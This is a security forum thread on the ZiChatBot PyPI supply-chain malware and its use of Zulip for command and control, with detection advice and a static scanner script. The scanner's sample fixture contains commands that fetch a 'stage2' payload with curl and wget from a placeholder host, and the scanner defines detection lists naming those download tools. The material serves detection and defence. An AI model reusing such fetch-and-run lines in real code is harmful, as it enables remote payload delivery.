
PyPI Supply Chain Alert: ZiChatBot & Zulip C2 Analysis

IAM_Specialist_Yuki 5/7/2026

Just caught the latest report on ZiChatBot targeting PyPI users. It’s a classic supply chain attack vector but with a twist: three malicious packages delivering malware via wheel files on both Windows and Linux.

The TTPs are concerning because they leverage Zulip APIs for Command and Control (C2). Since Zulip is a legitimate group chat application often used by engineering teams, the malware traffic effectively hides in plain sight. Blocking it isn't as simple as blacklisting a domain if your org uses it.

The malware doesn't just download files; it sets up persistence and communicates via the API, making it harder to distinguish from legitimate user activity.

If you're auditing, check your package installation logs. You can use pip-audit to check for known vulnerabilities, but for this specific supply chain risk, you need to check package provenance.

pip-audit --desc

Also, monitor for Python processes spawning curl or wget to unexpected endpoints, or specific modules importing the zulip client library without business justification.

How is everyone handling the vetting of new PyPI packages in your CI/CD pipelines? Are you doing static analysis on the source code or just trusting the package popularity?

RansomWatch_Steve 5/7/2026

The Zulip abuse is a clever evolution of the Discord/Telegram bot trends we saw last year. It makes signature-based detection nearly impossible if you use that tool internally. We're currently deploying Zeek to inspect the JSON payloads on Zulip connections; the C2 traffic usually has different metadata structures than human chatter.

MasterSlacker 5/7/2026

We stopped allowing direct pip install from the public index in our build pipelines a while back. We mirror packages to a private repo (Sonatype Nexus) and only promote packages after manual review. It slows down development slightly, but it completely blocks this type of typosquatting/malware injection.

Crypto_Miner_Watch_Pat 5/7/2026

Good catch on the Zulip API detail. For those looking for a quick IOC sweep, check your environment for unexpected imports of the zulip package in scripts that shouldn't be communicating externally.

import importlib.util

# pkgutil.find_loader is deprecated (removed in Python 3.14); find_spec answers
# the same question: is the 'zulip' client library importable in this interpreter?
if importlib.util.find_spec('zulip') is not None:
    print('Zulip library found in environment')

If you find it in a backend server that isn't supposed to be a chat bot, you might have an issue.
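Combining Pat's environment sweep with Yuki's point about Python spawning curl or wget, here is a static check as an added example (not code from any poster): it parses a script's AST for imports of the zulip client and for curl/wget invocations, and reports whether zulip is importable at all. The sample script is constructed, and the suspect-module and downloader lists are assumptions to tune per host.

```python
import ast
from importlib.util import find_spec
# Constructed sample script: imports the zulip client and shells out to curl/wget.
SAMPLE_SOURCE = '''
import os
import subprocess
import zulip
from zulip import Client

def run():
    subprocess.run(["curl", "-s", "http://example.invalid/stage2"])
    os.system("wget http://example.invalid/x")
'''
SUSPECT_MODULES = {"zulip"}   # assumption: libraries unexpected on this kind of host
DOWNLOADERS = {"curl", "wget"}

def _downloaders_in_call(call):  # yields curl/wget seen as first string arg or argv[0]
    for arg in call.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            parts = arg.value.split()
            if parts and parts[0] in DOWNLOADERS:
                yield parts[0]
        elif isinstance(arg, (ast.List, ast.Tuple)) and arg.elts:
            head = arg.elts[0]
            if isinstance(head, ast.Constant) and head.value in DOWNLOADERS:
                yield head.value

def scan_source(source, filename="<string>"):  # -> [(kind, name, lineno), ...]
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPECT_MODULES:
                    findings.append(("import", alias.name, node.lineno))
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in SUSPECT_MODULES:
                findings.append(("import", node.module, node.lineno))
        elif isinstance(node, ast.Call):
            for tool in _downloaders_in_call(node):
                findings.append(("spawn", tool, node.lineno))
    return findings

def zulip_installed():  # True when the zulip client library is importable here
    return find_spec("zulip") is not None

if __name__ == "__main__":
    for kind, name, line in scan_source(SAMPLE_SOURCE, "sample.py"):
        print(f"sample.py:{line}: {kind} {name}")
    print("zulip importable here:", zulip_installed())
```

A hit on a backend service with no chat-bot role is the signal Pat describes; a spawn finding without an import (or vice versa) is still worth a look, since the two indicators are independent.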
